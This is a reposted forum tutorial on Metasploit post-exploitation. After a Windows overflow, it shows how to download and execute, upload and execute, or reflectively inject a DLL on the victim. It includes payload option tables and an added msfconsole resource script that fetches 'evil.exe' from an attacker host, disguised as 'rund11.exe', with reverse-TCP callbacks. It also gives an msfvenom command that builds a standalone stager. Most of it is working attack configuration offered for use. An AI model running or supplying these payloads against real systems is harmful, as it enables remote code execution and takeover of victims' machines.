After an overflow has succeeded we often need to run a module of our own on the target (a remote-control agent, a scanner, and so on). A few ways to get it there and execute it:
0x01. Drive the execution through another post-exploitation module, e.g. a Meterpreter script: once you have a session, use Meterpreter itself to upload the file and execute it.
0x02. Use the windows/download_exec payload to download and execute:
Module options (payload/windows/download_exec):

Name      Current Setting                Required  Description
----      ---------------                --------  -----------
EXE       rund11.exe                     yes       Filename to save & run executable on target system
EXITFUNC  process                        yes       Exit technique: seh, thread, process, none
URL       http://localhost:443/evil.exe  yes       The pre-encoded URL to the executable

Note that the download is performed by the exploited process on the target, so the URL is resolved there: the localhost default has to be replaced with an address the victim can actually reach, and the file has to be served before the exploit fires.
The payload's script is split into a download part and an execute part; the code is in /opt/metasploit/msf3/modules/payloads/singles/windows/download_exec.rb. The code is clear and worth reading to learn how such payloads are written.
0x03. Use the modules under payload/windows/upexec/ to upload and execute directly:
Module options (payload/windows/upexec/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port
PEXEC                      yes       Full path to the file to upload and execute

Set the reverse-connection options (LHOST, LPORT) so the stager can call back, point PEXEC at the executable on the attacking machine, and the payload is ready to use; unlike download_exec, the target needs no outbound HTTP access, only the reverse_tcp connection.
0x04. Use payload/windows/dllinject/reverse_tcp to inject a DLL remotely:
Module options (payload/windows/dllinject/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
DLL                        yes       The local path to the Reflective DLL to upload
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port

As with upexec, set the reverse-connection options (LHOST, LPORT) and the DLL path and the payload is ready to use. The DLL option must point at a Reflective DLL, i.e. one built with the reflective loader export; an ordinary DLL will not load through this payload, because it is mapped into memory from the network rather than dropped to disk and loaded by the system loader.
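The msfconsole resource script below is an added example, not part of the original post, that puts the three payload choices from 0x02, 0x03 and 0x04 side by side so the option sets can be compared. Everything in it is assumed for illustration: the exploit module is a placeholder to be replaced with whatever overflow you are actually using, 192.168.1.20 is the target, 192.168.1.10 is the attacking host, and http://192.168.1.10:443/evil.exe, /root/tools/scanner.exe and /root/tools/inject.dll are made-up locations.

```text
# post_exec.rc -- added example; hosts, paths and the module name are assumptions.
# Run with:  msfconsole -r post_exec.rc
# Keep ONE of the three payload variants and delete the other two before running.

# Placeholder: substitute the overflow module you are exploiting.
use exploit/windows/REPLACE_WITH_YOUR_OVERFLOW_MODULE
set RHOST 192.168.1.20
set EXITFUNC process

# Variant 1 (0x02): windows/download_exec, single-stage, no listener needed.
# The victim fetches URL itself, so it points at the attacking host, not localhost,
# and evil.exe must already be served on 192.168.1.10:443.
set PAYLOAD windows/download_exec
set URL http://192.168.1.10:443/evil.exe
set EXE rund11.exe

# Variant 2 (0x03): windows/upexec/reverse_tcp, staged.
# PEXEC is a path on the attacking machine; the stage uploads and runs it.
# set PAYLOAD windows/upexec/reverse_tcp
# set LHOST 192.168.1.10
# set LPORT 4444
# set PEXEC /root/tools/scanner.exe

# Variant 3 (0x04): windows/dllinject/reverse_tcp, staged.
# DLL is a Reflective DLL on the attacking machine, mapped into the exploited process.
# set PAYLOAD windows/dllinject/reverse_tcp
# set LHOST 192.168.1.10
# set LPORT 4444
# set DLL /root/tools/inject.dll

exploit
```

If the payload is wanted outside an exploit module, the same download_exec options can be baked into a standalone executable with msfvenom, e.g. `msfvenom -p windows/download_exec URL=http://192.168.1.10:443/evil.exe EXE=rund11.exe -f exe -o stager.exe` (again with assumed values); the staged upexec and dllinject variants still need a reverse_tcp listener on LHOST:LPORT, which exploit/multi/handler provides.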
0x05. Custom scripts
Writing custom shellcode: http://bbs.pediy.com/showthread.php?t=109523
Reposted from WooYun